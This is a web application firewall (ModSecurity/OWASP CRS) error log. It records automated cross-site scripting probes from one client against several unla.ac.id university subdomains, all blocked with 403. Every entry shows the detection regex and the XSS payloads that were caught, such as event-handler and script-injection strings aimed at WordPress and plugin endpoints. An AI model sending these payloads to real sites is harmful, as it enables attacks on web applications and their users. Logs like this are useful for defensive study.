[Tue Aug 29 11:51:26.787897 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAlIBiMAAAAn"]
[Tue Aug 29 11:51:26.788789 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAjdQUoAAAAZ"]
[Tue Aug 29 11:51:26.818904 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAlUliwAAAA0"]
[Tue Aug 29 11:51:26.829099 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAm80PIAAAAF"]
[Tue Aug 29 11:51:26.887852 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAm-MdoAAAAI"]
[Tue Aug 29 11:51:26.888517 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAlIBiQAAAAn"]
[Tue Aug 29 11:51:26.895664 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/log"] [unique_id "ZO15TsCo-f0AAAjdQUsAAAAZ"]
[Tue Aug 29 11:51:26.897397 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15TsCo-f0AAAnB5VgAAAAJ"]
[Tue Aug 29 11:51:27.008259 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: ) found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15TsCo-f0AAAfWOE8AAAAL"]
[Tue Aug 29 11:51:27.008262 2023] [:error] [pid 2502] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAnGkIoAAAAR"]
[Tue Aug 29 11:51:27.010640 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAnIlg4AAAAV"]
[Tue Aug 29 11:51:27.027628 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAnDFy4AAAAM"]
[Tue Aug 29 11:51:27.029070 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAkr0GIAAAAC"]
[Tue Aug 29 11:51:27.035103 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15T8Co-f0AAAmLPTAAAAAN"]
[Tue Aug 29 11:51:27.534728 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:MESSAGE. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:MESSAGE: MESSAGE</textarea></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/activehelper-livehelp/server/offline.php"] [unique_id "ZO15T8Co-f0AAAm7m@wAAAAE"]
[Tue Aug 29 11:51:27.543427 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:shortcode_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: 1\\x22 onmouseover= found within ARGS:shortcode_id: 1\\x22 onmouseover=alert(document.domain)//"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15T8Co-f0AAAmNp5AAAAAQ"]
[Tue Aug 29 11:51:27.595071 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAnHQekAAAAT"]
[Tue Aug 29 11:51:27.596769 2023] [:error] [pid 2495] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm-MdwAAAAI"]
[Tue Aug 29 11:51:27.598924 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAm@5yUAAAAH"]
[Tue Aug 29 11:51:27.599859 2023] [:error] [pid 2499] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAnDFzAAAAAM"]
[Tue Aug 29 11:51:27.601596 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:hostname: </title><script>alert(document.domain)</script><title>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/php/telnet_form.php"] [unique_id "ZO15T8Co-f0AAAjdQU4AAAAZ"]
[Tue Aug 29 11:51:27.603394 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/login/"] [unique_id "ZO15T8Co-f0AAAmNp5EAAAAQ"]
[Tue Aug 29 11:51:27.604575 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );</ found within ARGS:type: \\x22</script><script>alert(document.domain);</script><script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/log"] [unique_id "ZO15T8Co-f0AAAkyyFkAAAAW"]
[Tue Aug 29 11:51:28.611558 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAnHQesAAAAT"]
[Tue Aug 29 11:51:28.737622 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');\\x22> found within ARGS:uid: \\x22><img src=\\x22x\\x22 onerror=\\x22alert('XSS');\\x22>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/login/"] [unique_id "ZO15UMCo-f0AAAmHd-UAAAAz"]
[Tue Aug 29 11:51:28.856710 2023] [:error] [pid 2354] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkyyFwAAAAW"]
[Tue Aug 29 11:51:28.867554 2023] [:error] [pid 2448] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAmQ-x8AAAAb"]
[Tue Aug 29 11:51:28.874236 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAjdQVEAAAAZ"]
[Tue Aug 29 11:51:28.915196 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:section. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /)</ found within ARGS:section: \\x22><h1>hello</h1><script>alert(/2Ue0IR2M1XBxYBON8r2blbSH9hk/)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/manlist"] [unique_id "ZO15UMCo-f0AAAmHd-cAAAAz"]
[Tue Aug 29 11:51:28.916351 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAjdQVIAAAAZ"]
[Tue Aug 29 11:51:28.916362 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:advSearch. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: '\\x22></ found within ARGS:advSearch: 0'\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15UMCo-f0AAAkr0GkAAAAC"]
[Tue Aug 29 11:51:28.917059 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:galleryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:galleryId: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/tidio-gallery/popup-insert-help.php"] [unique_id "ZO15UMCo-f0AAAlUljQAAAA0"]
